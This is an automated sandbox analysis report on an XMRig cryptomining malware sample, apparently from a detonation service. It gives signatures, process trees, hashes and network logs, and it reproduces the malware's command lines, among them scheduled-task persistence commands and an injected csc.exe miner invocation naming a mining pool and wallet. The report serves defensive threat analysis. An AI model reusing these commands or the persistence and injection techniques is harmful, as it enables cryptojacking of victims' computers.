Malware Analysis Report

2025-04-14 01:00

Sample ID: 240603-kmdtcahd3s
Target: 91290227566049adfd31ecd4c1296b92_JaffaCakes118
SHA256: 3295d5e6746be0ceb6557380a4b57e6606e8fad051279a0ff78b3236d7b91bf6
Tags: xmrig miner upx
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V15
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

Score: 10/10

SHA256: 3295d5e6746be0ceb6557380a4b57e6606e8fad051279a0ff78b3236d7b91bf6

Threat Level: Known bad

The file 91290227566049adfd31ecd4c1296b92_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

xmrig miner upx

xmrig

XMRig Miner payload

Loads dropped DLL

UPX packed file

Checks computer location settings

Deletes itself

Executes dropped EXE

Suspicious use of SetThreadContext

Unsigned PE

Enumerates physical storage devices

Program crash

Suspicious use of WriteProcessMemory

Delays execution with timeout.exe

Creates scheduled task(s)

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-06-03 08:42

Signatures

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-06-03 08:42
Reported: 2024-06-03 08:45
Platform: win7-20240221-en
Max time kernel: 149s
Max time network: 154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A   (15 identical rows)

Deletes itself

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe | N/A
N/A | N/A | C:\Users\Admin\scvhots.exe | N/A

Loads dropped DLL

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe | N/A

UPX packed file

upx
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A   (18 identical rows)

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 1936 set thread context of 920 | N/A | C:\Users\Admin\scvhots.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A

Delays execution with timeout.exe

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeLockMemoryPrivilege (×2) | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2004 wrote to memory of 2256 (×4) | N/A | C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe | C:\Windows\SysWOW64\cmd.exe
PID 2004 wrote to memory of 2632 (×4) | N/A | C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe | C:\Windows\SysWOW64\cmd.exe
PID 2256 wrote to memory of 2832 (×4) | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\schtasks.exe
PID 2632 wrote to memory of 3024 (×4) | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\chcp.com
PID 2256 wrote to memory of 2904 (×4) | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\schtasks.exe
PID 2632 wrote to memory of 2492 (×4) | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe
PID 2632 wrote to memory of 2456 (×4) | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\timeout.exe
PID 2492 wrote to memory of 1936 (×4) | N/A | C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe | C:\Users\Admin\scvhots.exe
PID 1936 wrote to memory of 920 (×9) | N/A | C:\Users\Admin\scvhots.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

Processes

C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\zbe20246384251130.bat" "

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\zb20246384251130.bat" "

C:\Windows\SysWOW64\schtasks.exe

Schtasks.EXE /delete /tn "Maintenance" /f

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\Windows\SysWOW64\schtasks.exe

Schtasks.EXE /create /tn "Maintenance" /xml "C:\Users\Admin\AppData\Local\Temp\zx20246384251130.xml"

C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe"

C:\Windows\SysWOW64\timeout.exe

timeout /t 3 /nobreak

C:\Users\Admin\scvhots.exe

"C:\Users\Admin\scvhots.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe -a cryptonight -o pool.supportxmr.com:80 -u 453ys3CV57Nbg2XCekHZdJRHyGd4uSB1oTuWEs5btLfsYDKE71XAmUVYybZXVBeZDS34zWxkWL6pNRNPPXHChq6CGwNa5j4 -p cpu --av=0 -t 1 --donate-level=1

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | pool.supportxmr.com | udp
CH | 141.94.96.144:80 | pool.supportxmr.com | tcp   (14 connections)
CH | 141.94.96.195:80 | pool.supportxmr.com | tcp   (2 connections)
CH | 141.94.96.71:80 | pool.supportxmr.com | tcp   (8 connections)

Files

C:\Users\Admin\AppData\Local\Temp\zbe20246384251130.bat

MD5 98228d10daef5f91cccf5e0fb25f130e
SHA1 f94ed868eaee3015706b274d7a30f0c7086dc215
SHA256 d0d065878458a486bb9b453884cce4f0e13b83950f374cb765e2bbc9610995ff
SHA512 97eaf08ae5765f90734c762ddd77a196ca86a73f0660c4e8b7970e202487a471196d7ed186ab60b79dffc90d23ef3fa1ea3e44e515f22fe34a965cab09fc95d3

C:\Users\Admin\AppData\Local\Temp\zb20246384251130.bat

MD5 a8392a9f77078d7955410a1bf5fa9a82
SHA1 8963744692735559bce6322dcdb9a5f67fd952ba
SHA256 eff1ea1ce1e42d01c25fa203cb2f43316602d2cf51b88ef60ebd6679e57ddb11
SHA512 8dd07d99cafbe2bce9402f5eae33bf46e4b1f93b73b5815b5957f444be8c851f27e1143ef7923e86c6b4059f3ba4af8bd1bd37f625cad8c6005c12f75f708777

C:\Users\Admin\AppData\Local\Temp\ze20246384251130.tmp

MD5 f4cdf35f34063c1b0377008ae133e79f
SHA1 935d7e86cfb4d7b853a6e51f7e4ab938a0a46136
SHA256 317a902c2d5a9307e87f7e751aff4745379727fa99c9900d387f0eadd4fbbe43
SHA512 7c7216b2ed6ca7381a6ff0cc66b04e20720a9bb9b24cedfaa0158204d6bb6f5937dc4ee6c9b3529fbcebf002415792bd7de81cecbbde9c404ae4e709893a1e9f

C:\Users\Admin\AppData\Local\Temp\zx20246384251130.xml

MD5 bae07d90cc9071ee0f4d37b3f89d6a57
SHA1 90b6121e67985028c970bb3b5553324a4f9f611d
SHA256 742b5a10cb78290d18a962a81436a61d4d5124e748a5c59681684a924d6545d8
SHA512 9a5a143b91cecdda0e2924c467b30b856b0ae501f5c67746ea9c2b60b40666bbe9d101b806740489f2ba92da7a0165fbb44e536c6aedf6002406f506a3c4d9a8

memory/2632-25-0x0000000001F10000-0x00000000020FD000-memory.dmp

memory/2492-26-0x0000000000400000-0x00000000005ED000-memory.dmp

memory/2492-27-0x0000000074D20000-0x0000000074D6A000-memory.dmp

memory/2492-29-0x0000000000240000-0x0000000000241000-memory.dmp

memory/2492-28-0x0000000000400000-0x00000000005ED000-memory.dmp

memory/2492-34-0x0000000074F90000-0x0000000074F99000-memory.dmp

memory/2492-33-0x0000000075780000-0x00000000757D7000-memory.dmp

memory/2492-31-0x0000000075DD0000-0x0000000075E7C000-memory.dmp

memory/2492-32-0x0000000075730000-0x0000000075777000-memory.dmp

memory/2492-35-0x00000000746E0000-0x0000000074C8B000-memory.dmp

memory/2492-36-0x00000000760D0000-0x0000000076D1A000-memory.dmp

memory/2492-38-0x0000000077060000-0x00000000771BC000-memory.dmp

memory/2492-39-0x0000000074D90000-0x0000000074DEB000-memory.dmp

memory/2492-41-0x0000000075500000-0x000000007558F000-memory.dmp

memory/2492-42-0x0000000072230000-0x0000000072325000-memory.dmp

memory/1936-57-0x0000000075780000-0x00000000757D7000-memory.dmp

memory/1936-53-0x00000000002C0000-0x00000000002C1000-memory.dmp

memory/1936-59-0x00000000746E0000-0x0000000074C8B000-memory.dmp

memory/2492-66-0x0000000074D20000-0x0000000074D6A000-memory.dmp

memory/1936-58-0x0000000074F90000-0x0000000074F99000-memory.dmp

memory/1936-56-0x0000000075730000-0x0000000075777000-memory.dmp

memory/1936-55-0x0000000075DD0000-0x0000000075E7C000-memory.dmp

memory/1936-60-0x00000000760D0000-0x0000000076D1A000-memory.dmp

memory/2492-69-0x00000000760D0000-0x0000000076D1A000-memory.dmp

memory/2492-78-0x0000000075500000-0x000000007558F000-memory.dmp

memory/2492-77-0x0000000072230000-0x0000000072325000-memory.dmp

memory/2492-76-0x0000000074D90000-0x0000000074DEB000-memory.dmp

memory/2492-75-0x0000000077060000-0x00000000771BC000-memory.dmp

memory/2492-74-0x00000000746E0000-0x0000000074C8B000-memory.dmp

memory/2492-73-0x0000000074F90000-0x0000000074F99000-memory.dmp

memory/2492-72-0x0000000074DF0000-0x0000000074E6D000-memory.dmp

memory/2492-71-0x0000000075780000-0x00000000757D7000-memory.dmp

memory/1936-70-0x0000000074D90000-0x0000000074DEB000-memory.dmp

memory/2492-64-0x0000000075DD0000-0x0000000075E7C000-memory.dmp

memory/2492-62-0x0000000075730000-0x0000000075777000-memory.dmp

memory/2492-61-0x0000000000400000-0x00000000005ED000-memory.dmp

memory/1936-68-0x0000000077060000-0x00000000771BC000-memory.dmp

memory/1936-52-0x0000000000400000-0x00000000005ED000-memory.dmp

memory/1936-51-0x0000000000400000-0x00000000005ED000-memory.dmp

memory/1936-50-0x0000000074D20000-0x0000000074D6A000-memory.dmp

memory/2492-49-0x0000000004D30000-0x0000000004F1D000-memory.dmp

memory/1936-85-0x0000000074D20000-0x0000000074D6A000-memory.dmp

memory/1936-83-0x0000000075DD0000-0x0000000075E7C000-memory.dmp

memory/1936-81-0x0000000075730000-0x0000000075777000-memory.dmp

memory/1936-80-0x0000000000400000-0x00000000005ED000-memory.dmp

memory/1936-86-0x00000000760D0000-0x0000000076D1A000-memory.dmp

memory/920-93-0x0000000000400000-0x000000000057C000-memory.dmp

memory/1936-92-0x0000000074D90000-0x0000000074DEB000-memory.dmp

memory/1936-90-0x00000000746E0000-0x0000000074C8B000-memory.dmp

memory/1936-91-0x0000000077060000-0x00000000771BC000-memory.dmp

memory/1936-89-0x0000000074F90000-0x0000000074F99000-memory.dmp

memory/1936-88-0x0000000074DF0000-0x0000000074E6D000-memory.dmp

memory/1936-87-0x0000000075780000-0x00000000757D7000-memory.dmp

memory/920-79-0x0000000000400000-0x000000000057C000-memory.dmp

memory/920-95-0x0000000000400000-0x000000000057C000-memory.dmp

memory/920-94-0x0000000000400000-0x000000000057C000-memory.dmp

memory/920-96-0x0000000000400000-0x000000000057C000-memory.dmp

memory/920-97-0x0000000000400000-0x000000000057C000-memory.dmp

memory/920-98-0x0000000000400000-0x000000000057C000-memory.dmp

memory/920-99-0x0000000000400000-0x000000000057C000-memory.dmp

memory/920-100-0x0000000000400000-0x000000000057C000-memory.dmp

memory/920-101-0x0000000000400000-0x000000000057C000-memory.dmp

memory/920-102-0x0000000000400000-0x000000000057C000-memory.dmp

memory/920-103-0x0000000000400000-0x000000000057C000-memory.dmp

memory/920-104-0x0000000000400000-0x000000000057C000-memory.dmp

memory/920-105-0x0000000000400000-0x000000000057C000-memory.dmp

memory/920-106-0x0000000000400000-0x000000000057C000-memory.dmp

memory/920-107-0x0000000000400000-0x000000000057C000-memory.dmp

memory/920-108-0x0000000000400000-0x000000000057C000-memory.dmp

memory/920-109-0x0000000000400000-0x000000000057C000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted: 2024-06-03 08:42
Reported: 2024-06-03 08:45
Platform: win10v2004-20240508-en
Max time kernel: 149s
Max time network: 151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A   (10 identical rows)

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe | N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A

Delays execution with timeout.exe

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe | N/A   (×2)

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeLockMemoryPrivilege (×2) | N/A | C:\Users\Admin\AppData\Local\Temp\6f626a69797569658864148781170505728\idle_maintenance.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1876 wrote to memory of 860 (×3) | N/A | C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe | C:\Windows\SysWOW64\cmd.exe
PID 1876 wrote to memory of 3508 (×3) | N/A | C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe | C:\Windows\SysWOW64\cmd.exe
PID 860 wrote to memory of 3472 (×3) | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\schtasks.exe
PID 860 wrote to memory of 4524 (×3) | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\schtasks.exe
PID 3508 wrote to memory of 1236 (×3) | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\chcp.com
PID 3508 wrote to memory of 2524 (×3) | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe
PID 3508 wrote to memory of 4748 (×3) | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\timeout.exe
PID 800 wrote to memory of 3180 (×2) | N/A | C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe | C:\Users\Admin\AppData\Local\Temp\6f626a69797569658864148781170505728\idle_maintenance.exe

Processes

C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zbe20246384248362.bat" "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zb20246384248362.bat" "

C:\Windows\SysWOW64\schtasks.exe

Schtasks.EXE /delete /tn "Maintenance" /f

C:\Windows\SysWOW64\schtasks.exe

Schtasks.EXE /create /tn "Maintenance" /xml "C:\Users\Admin\AppData\Local\Temp\zx20246384248362.xml"

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe"

C:\Windows\SysWOW64\timeout.exe

timeout /t 3 /nobreak

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2524 -ip 2524

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2524 -s 372

C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe

C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe

C:\Users\Admin\AppData\Local\Temp\6f626a69797569658864148781170505728\idle_maintenance.exe

C:\Users\Admin\AppData\Local\Temp\6f626a69797569658864148781170505728\idle_maintenance.exe

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp
US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 227.143.123.92.in-addr.arpa | udp
US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp
NL | 23.62.61.168:443 | www.bing.com | tcp
US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 168.61.62.23.in-addr.arpa | udp
US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp
US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp
US | 8.8.8.8:53 | xmr-us-east1.nanopool.org | udp
CA | 51.222.12.201:14444 | xmr-us-east1.nanopool.org | tcp
US | 8.8.8.8:53 | xmr-us-east1.nanopool.org | udp
CA | 51.79.71.77:14444 | xmr-us-east1.nanopool.org | tcp
US | 8.8.8.8:53 | 201.12.222.51.in-addr.arpa | udp
US | 8.8.8.8:53 | 77.71.79.51.in-addr.arpa | udp
US | 8.8.8.8:53 | 97.90.14.23.in-addr.arpa | udp
US | 8.8.8.8:53 | 88.90.14.23.in-addr.arpa | udp
US | 8.8.8.8:53 | 10.173.189.20.in-addr.arpa | udp

Files

C:\Users\Admin\AppData\Local\Temp\zbe20246384248362.bat

MD5 c52a50ad7723919bc4970694f3fa659f
SHA1 d828056bf36ae0c035e5e6ae9bb9beeb0d8f1471
SHA256 c63a9d286b483741055a5628a0cb2a5893e00a7cca874a954bbf0da54039179b
SHA512 a5026aa0c4888900c45fe5ed02600fc80e98b5603a461ac8ebde420e9b4a9381cbe5bde7c34dc665ce28ab80b423d1da6b60166c1a9651a1bb01c9f5314afc27

C:\Users\Admin\AppData\Local\Temp\zb20246384248362.bat

MD5 bce7e5428337ca3a72e55dafb75179d1
SHA1 7a582edb0e6533cd5b11da4aa777aa78aa788b5c
SHA256 f02aa457ed3471f91640da8ee62fa506440ba6abe043418b29781219312a84ba
SHA512 946abd5d35a0f62c85d7e8464148cd537fbf7b2b69e7d558afba65a8c778fb034cccd08620643895bfbb7c5ccc99242a858799195180321ae6741b4bfdc258e2

C:\Users\Admin\AppData\Local\Temp\zx20246384248362.xml

MD5 209f5fcd60089042d85b45f770eb07e2
SHA1 cb245161cc2204192107c7c84ab5aca01c007a5f
SHA256 d213081cc799b3d17c8aea6855744e90a0f82be1a4f4ac4b079919366ca78d97
SHA512 797fa36bee51a1745c5f7bb4561c120d1f293cbf897a573589697752e155ff7c896ae3746197cc036cee4ebb1cc749dc930c6b68b4f2a9d3ad011262c06942ca

C:\Users\Admin\AppData\Local\Temp\ze20246384248362.tmp

MD5 f4cdf35f34063c1b0377008ae133e79f
SHA1 935d7e86cfb4d7b853a6e51f7e4ab938a0a46136
SHA256 317a902c2d5a9307e87f7e751aff4745379727fa99c9900d387f0eadd4fbbe43
SHA512 7c7216b2ed6ca7381a6ff0cc66b04e20720a9bb9b24cedfaa0158204d6bb6f5937dc4ee6c9b3529fbcebf002415792bd7de81cecbbde9c404ae4e709893a1e9f

memory/2524-15-0x0000000000402000-0x00000000005CE000-memory.dmp

memory/2524-18-0x0000000000730000-0x0000000000731000-memory.dmp

memory/2524-16-0x0000000000400000-0x00000000005ED000-memory.dmp

memory/2524-17-0x0000000000400000-0x00000000005ED000-memory.dmp

memory/2524-14-0x0000000000400000-0x00000000005ED000-memory.dmp

memory/2524-19-0x0000000000400000-0x00000000005ED000-memory.dmp

memory/2524-20-0x0000000075B90000-0x0000000075BE2000-memory.dmp

memory/2524-21-0x0000000000402000-0x00000000005CE000-memory.dmp

C:\Users\Admin\AppData\Roaming\Maintenance\apps\maintenance.exe

MD5 322d23bc1ee34b9abe2c992274ae417f
SHA1 aad310f27146cea18660a7d248ee9a3d5ae3fe87
SHA256 f93548cecd2f003c0b6cc6a87b8095b214919db50e888b00f3c2c0ac43546426
SHA512 221d75a9e470097a78fd39f5776939f9a9fafb901191d04be813a57ded5d1f6425724a19cb4479778362cd4318ae61e19611479c4d5af3778c6424eb6cad4d0f

C:\Users\Admin\AppData\Local\Temp\6f626a69797569658864148781170505728\idle_maintenance.exe

MD5 35fadb783458c2c49f06ac6991362ec1
SHA1 5d8a08ddf30df09f90613a5998b6106166ae81f5
SHA256 56141544ac6d03565909b3043fab104bf40cadb32d53a12d821e1328bc50f087
SHA512 abf028a19f1078f41c76eb0b5bc389c4d94f784c497436691e1933a87919fa7589945437fa95a656770ccd29aec328ab5349c6fc7dfd8731fc4c927538f6921f

C:\Users\Admin\AppData\Local\Temp\6f626a69797569658864148781170505728\config.json

MD5 724373fdc80811cf935575305dabc412
SHA1 720c6b63d13008eb165d586f62297350d70a42a9
SHA256 4acd1300efefc1f61daddbc62583af929b0d490af812c7dce3358cc10d6f930f
SHA512 470a18006057379b8d7af91c2884534df04f5a82c499881f6d59b639ea29ee1b14e3714ab60c90c6b9dcbdc9ef59abdc24f7eec359e9253bb42cf1488f2826bd

memory/3180-31-0x0000000000400000-0x000000000050D000-memory.dmp

memory/3180-32-0x0000000000400000-0x000000000050D000-memory.dmp

memory/3180-33-0x0000000000400000-0x000000000050D000-memory.dmp

memory/3180-36-0x0000000000400000-0x000000000050D000-memory.dmp

memory/3180-37-0x0000000000400000-0x000000000050D000-memory.dmp

memory/3180-38-0x0000000000400000-0x000000000050D000-memory.dmp

memory/3180-39-0x0000000000400000-0x000000000050D000-memory.dmp

memory/3180-40-0x0000000000400000-0x000000000050D000-memory.dmp

memory/3180-41-0x0000000000400000-0x000000000050D000-memory.dmp